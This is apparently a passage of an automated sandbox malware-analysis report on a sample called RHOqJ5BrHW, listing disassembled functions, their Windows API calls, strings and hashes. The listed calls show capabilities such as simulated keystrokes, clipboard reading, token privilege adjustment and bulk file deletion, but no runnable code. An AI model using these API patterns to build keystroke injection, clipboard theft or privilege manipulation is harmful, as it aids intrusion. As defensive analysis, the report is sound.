                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID:
                                    • API String ID: 2638373210-0
                                    • Opcode ID: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction ID: 765bf860a026e9e95ff785f2d51db6cee22719dcf7488cbebbf7b57d69588e92
                                    • Opcode Fuzzy Hash: 3cca4198d2bc13ecada8dba30311a83a0df564d107d747b73ddd6f796e1577fd
                                    • Instruction Fuzzy Hash: BFE092B0504B009BD7348A24D801BE373E4EB06305F00085DF29B83242EB627C41C65A
                                    Function 00CA86E8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CA86F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction ID: 963c04c221674a35bb181db9a51738122f2429eee0232c054f90350f1504ab0b
                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                    • Instruction Fuzzy Hash: E7E08C30915209EBCB50CAA88908AA973A8AB06324F204654F816C3690DA308E08E760
                                    Function 00984798 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,009F40EA,00000000,00000000,00000000), ref: 009847A9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: ebaff5b9cbe4bf974975e48c879e175c7a23d6e1a63c69699180d03d1dffb976
                                    • Instruction ID: fbbb3529a9aa0d792ca88b705850036f94f1621a4e664863081f3d4ea94ef87f
                                    • Opcode Fuzzy Hash: ebaff5b9cbe4bf974975e48c879e175c7a23d6e1a63c69699180d03d1dffb976
                                    • Instruction Fuzzy Hash: 89D0C97464020CBFEB00CB90DC46F9A7BBCEB04718F200194F600A62D0D6F2BE818B55
                                    Function 00CA86B8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFileAttributesW.KERNELBASE(?), ref: 00CA86C3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction ID: 37709af3206661aaf60b770a365a9cbd8f7c3dc826998b2c98512819efa037e8
                                    • Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
                                    • Instruction Fuzzy Hash: CED0A73090620DEBDB10CFB49D099DF73A8D706325F104754FD15C7280D9319E149750
                                    Function 009FB31E Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?), ref: 009FB32A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: PathTemp
                                    • String ID:
                                    • API String ID: 2920410445-0
                                    • Opcode ID: 2ac1c800f95c27c0b41ff258d5c3be7ddaf458784afdf1a36a86fa8ca2a32699
                                    • Instruction ID: 3c956bc948e07f349ad868672458464b0721f036d3c497c8006d0a611055bfcd
                                    • Opcode Fuzzy Hash: 2ac1c800f95c27c0b41ff258d5c3be7ddaf458784afdf1a36a86fa8ca2a32699
                                    • Instruction Fuzzy Hash: 1DC04CB150169E9BD752A790CD55AF873689B04B01F0440D16649A11609A745B828B11
                                    Function 00CAA0F4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 00CAA109
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction ID: d7bb15004184126d697d526d69b4095913fca4dd087a490fe9e5978dbd118a6b
                                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                    • Instruction Fuzzy Hash: 17E0BF7494010EEFDB00DFA4D5496DD7BB4EF04301F1005A1FD05D7680DB309E54CA62
                                    Function 00CAA0F8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNELBASE(000001F4), ref: 00CAA109
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050453004.0000000000CA7000.00000040.00000020.00020000.00000000.sdmp, Offset: 00CA7000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_ca7000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Sleep
                                    • String ID:
                                    • API String ID: 3472027048-0
                                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction ID: 81f53b5f598a54513acc03ee3d8238e4e4213af404ffd532120ac4c8d87f5658
                                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                    • Instruction Fuzzy Hash: ACE0E67494010EEFDB00DFB4D54969D7BF4EF04301F100161FD01D2280D7309D50CA62

                                    Non-executed Functions

                                    Function 009EF7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 009EF87D
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EF8DC
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009EF919
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EF940
                                    • SendMessageW.USER32 ref: 009EF966
                                    • _wcsncpy.LIBCMT ref: 009EF9D2
                                    • GetKeyState.USER32(00000011), ref: 009EF9F3
                                    • GetKeyState.USER32(00000009), ref: 009EFA00
                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 009EFA16
                                    • GetKeyState.USER32(00000010), ref: 009EFA20
                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009EFA4F
                                    • SendMessageW.USER32 ref: 009EFA72
                                    • SendMessageW.USER32(?,00001030,?,009EE059), ref: 009EFB6F
                                    • 6F58CB00.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 009EFB85
                                    • 6F58C2F0.COMCTL32(00000000,000000F8,000000F0), ref: 009EFB96
                                    • SetCapture.USER32(?), ref: 009EFB9F
                                    • ClientToScreen.USER32(?,?), ref: 009EFC03
                                    • 6F58C530.COMCTL32(00000000,?,?), ref: 009EFC0F
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 009EFC29
                                    • ReleaseCapture.USER32 ref: 009EFC34
                                    • GetCursorPos.USER32(?), ref: 009EFC69
                                    • ScreenToClient.USER32(?,?), ref: 009EFC76
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFCD8
                                    • SendMessageW.USER32 ref: 009EFD02
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFD41
                                    • SendMessageW.USER32 ref: 009EFD6C
                                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 009EFD84
                                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 009EFD8F
                                    • GetCursorPos.USER32(?), ref: 009EFDB0
                                    • ScreenToClient.USER32(?,?), ref: 009EFDBD
                                    • GetParent.USER32(?), ref: 009EFDD9
                                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 009EFE3F
                                    • SendMessageW.USER32 ref: 009EFE6F
                                    • ClientToScreen.USER32(?,?), ref: 009EFEC5
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 009EFEF1
                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 009EFF19
                                    • SendMessageW.USER32 ref: 009EFF3C
                                    • ClientToScreen.USER32(?,?), ref: 009EFF86
                                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 009EFFB6
                                    • GetWindowLongW.USER32(?,000000F0), ref: 009F004B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$C530DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                    • String ID: @GUI_DRAGID$F
                                    • API String ID: 769010159-4164748364
                                    • Opcode ID: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                    • Instruction ID: 6031c6fcd36b17e975323f190b2ebc256231c0af7e234d5aa7e734052cb4e973
                                    • Opcode Fuzzy Hash: 84a0720e687878b804e90c2b0c418b8349bc62d5660d99527164a5425d9b77a2
                                    • Instruction Fuzzy Hash: 5432F075604384EFDB12CFA4C894B6ABBA8FF89344F144A2AF695C72A1D731DC42CB51
                                    Function 009EAACE Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 009EB1CD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: %d/%02d/%02d
                                    • API String ID: 3850602802-328681919
                                    • Opcode ID: 841682fd54f5394560c15c04f4ab70301a5e32a5c05d1cadbca6e468658b7552
                                    • Instruction ID: d7cf4339e71c658a5ce6c9d2c2199e0bfde5bff523aa2342464dca1452f9ec24
                                    • Opcode Fuzzy Hash: 841682fd54f5394560c15c04f4ab70301a5e32a5c05d1cadbca6e468658b7552
                                    • Instruction Fuzzy Hash: D412C071500248ABEB269FA6CC49FAF7BB8FF85320F104519F915DA2E1DB749D42CB11
                                    Function 0099EB42 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(00000000,00000000), ref: 0099EB4A
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009F3AEA
                                    • IsIconic.USER32(000000FF), ref: 009F3AF3
                                    • ShowWindow.USER32(000000FF,00000009), ref: 009F3B00
                                    • SetForegroundWindow.USER32(000000FF), ref: 009F3B0A
                                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 009F3B20
                                    • GetCurrentThreadId.KERNEL32 ref: 009F3B27
                                    • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 009F3B33
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B44
                                    • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 009F3B4C
                                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 009F3B54
                                    • SetForegroundWindow.USER32(000000FF), ref: 009F3B57
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B6C
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3B77
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B81
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3B86
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B8F
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3B94
                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 009F3B9E
                                    • keybd_event.USER32(00000012,00000000), ref: 009F3BA3
                                    • SetForegroundWindow.USER32(000000FF), ref: 009F3BA6
                                    • AttachThreadInput.USER32(000000FF,?,00000000), ref: 009F3BCD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 4125248594-2988720461
                                    • Opcode ID: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                    • Instruction ID: 7b3be6d1954baf5b3827b6788919fbffa80ab2cd1c9465b10b97ba4d2c7911c4
                                    • Opcode Fuzzy Hash: 66703ff2023ffad121d25210d689ecb4e9fdcaf7e55d035ff9a9de774c507bd4
                                    • Instruction Fuzzy Hash: 69314572A4021CBFEB215BE59C49F7F7E6CEB44B50F104015FB05EA1D1D6B59D029BA0
                                    Function 009BACC5 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 223COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                      • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                      • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                    • _memset.LIBCMT ref: 009BAD08
                                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 009BAD5A
                                    • CloseHandle.KERNEL32(?), ref: 009BAD6B
                                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 009BAD82
                                    • GetProcessWindowStation.USER32 ref: 009BAD9B
                                    • SetProcessWindowStation.USER32(00000000), ref: 009BADA5
                                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 009BADBF
                                      • Part of subcall function 009BAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009BACC0), ref: 009BAB99
                                      • Part of subcall function 009BAB84: CloseHandle.KERNEL32(?,?,009BACC0), ref: 009BABAB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                    • String ID: $default$winsta0
                                    • API String ID: 2063423040-1027155976
                                    • Opcode ID: a2849ff5b617f50a1a2817cd953b5cda76846243b8f2f78cbd241aedf22f230c
                                    • Instruction ID: d6e06b7488773633147f30beea5a89bfd631881f76136157fc4d927f4f44d864
                                    • Opcode Fuzzy Hash: a2849ff5b617f50a1a2817cd953b5cda76846243b8f2f78cbd241aedf22f230c
                                    • Instruction Fuzzy Hash: C3816B72800209AFEF11DFE4DE49AEEBBBCEF04324F044119F914A61A1D7728E56DB61
                                    Function 009C60DD Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 174filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009C5FA6,?), ref: 009C6ED8
                                      • Part of subcall function 009C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009C5FA6,?), ref: 009C6EF1
                                      • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C727B
                                      • Part of subcall function 009C725E: __wsplitpath.LIBCMT ref: 009C728E
                                      • Part of subcall function 009C72CB: GetFileAttributesW.KERNEL32(?,009C6019), ref: 009C72CC
                                    • _wcscat.LIBCMT ref: 009C6149
                                    • _wcscat.LIBCMT ref: 009C6167
                                    • __wsplitpath.LIBCMT ref: 009C618E
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009C61A4
                                    • _wcscpy.LIBCMT ref: 009C6209
                                    • _wcscat.LIBCMT ref: 009C621C
                                    • _wcscat.LIBCMT ref: 009C622F
                                    • lstrcmpiW.KERNEL32(?,?), ref: 009C625D
                                    • DeleteFileW.KERNEL32(?), ref: 009C626E
                                    • MoveFileW.KERNEL32(?,?), ref: 009C6289
                                    • MoveFileW.KERNEL32(?,?), ref: 009C6298
                                    • CopyFileW.KERNEL32(?,?,00000000), ref: 009C62AD
                                    • DeleteFileW.KERNEL32(?), ref: 009C62BE
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 009C62E1
                                    • FindClose.KERNEL32(00000000), ref: 009C62FD
                                    • FindClose.KERNEL32(00000000), ref: 009C630B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1917200108-1173974218
                                    • Opcode ID: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
                                    • Instruction ID: 7d986afe1317f986c8643e9ac30f6d15dfa37a319432f3f76cef9b19f2b9fc84
                                    • Opcode Fuzzy Hash: c96f2b732773e21ad69588e4d6db18c7ac641f575ed25e17df808a7ab8b45e46
                                    • Instruction Fuzzy Hash: 9C511F72C0811C6ACB21EB95CC44EEFB7BCAF45300F0905EAE595E2141EE36974ACFA5
                                    Function 009D6B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32(00A1DC00), ref: 009D6B36
                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 009D6B44
                                    • GetClipboardData.USER32(0000000D), ref: 009D6B4C
                                    • CloseClipboard.USER32 ref: 009D6B58
                                    • GlobalLock.KERNEL32(00000000), ref: 009D6B74
                                    • CloseClipboard.USER32 ref: 009D6B7E
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009D6B93
                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 009D6BA0
                                    • GetClipboardData.USER32(00000001), ref: 009D6BA8
                                    • GlobalLock.KERNEL32(00000000), ref: 009D6BB5
                                    • GlobalUnlock.KERNEL32(00000000), ref: 009D6BE9
                                    • CloseClipboard.USER32 ref: 009D6CF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                    • String ID:
                                    • API String ID: 3222323430-0
                                    • Opcode ID: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
                                    • Instruction ID: 9bafe0fbb01de3ae504db69cdc33f613ec77182b10f9e533f841aeff1d2f2d7b
                                    • Opcode Fuzzy Hash: 15402e3f31fd536b94edeea822d25c07dd4e4db16edf052773184b7e2a6661d2
                                    • Instruction Fuzzy Hash: 5B519072244205ABD300FFA4DD96F6E77A8AF88B10F00442AF686D62D1DF75D9068B62
                                    Function 009CF5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009CF62B
                                    • FindClose.KERNEL32(00000000), ref: 009CF67F
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6A4
                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 009CF6BB
                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 009CF6E2
                                    • __swprintf.LIBCMT ref: 009CF72E
                                    • __swprintf.LIBCMT ref: 009CF767
                                    • __swprintf.LIBCMT ref: 009CF7BB
                                      • Part of subcall function 009A172B: __woutput_l.LIBCMT ref: 009A1784
                                    • __swprintf.LIBCMT ref: 009CF809
                                    • __swprintf.LIBCMT ref: 009CF858
                                    • __swprintf.LIBCMT ref: 009CF8A7
                                    • __swprintf.LIBCMT ref: 009CF8F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                    • API String ID: 835046349-2428617273
                                    • Opcode ID: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
                                    • Instruction ID: 3030244f3bcf8eec397ceb097d2e680005fdf8fb9c3a282b9b6f07b97c2e76a3
                                    • Opcode Fuzzy Hash: 7169e5460165ca8b838dd1c0318d92b37f8b37e6cd93a742876cd5a76961a13e
                                    • Instruction Fuzzy Hash: E8A100B2408344ABC710EFA4C995EAFB7ECAF98704F440D2EF595C2152EB34D949C762
                                    Function 009D1B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 009D1B50
                                    • _wcscmp.LIBCMT ref: 009D1B65
                                    • _wcscmp.LIBCMT ref: 009D1B7C
                                    • GetFileAttributesW.KERNEL32(?), ref: 009D1B8E
                                    • SetFileAttributesW.KERNEL32(?,?), ref: 009D1BA8
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009D1BC0
                                    • FindClose.KERNEL32(00000000), ref: 009D1BCB
                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 009D1BE7
                                    • _wcscmp.LIBCMT ref: 009D1C0E
                                    • _wcscmp.LIBCMT ref: 009D1C25
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 009D1C37
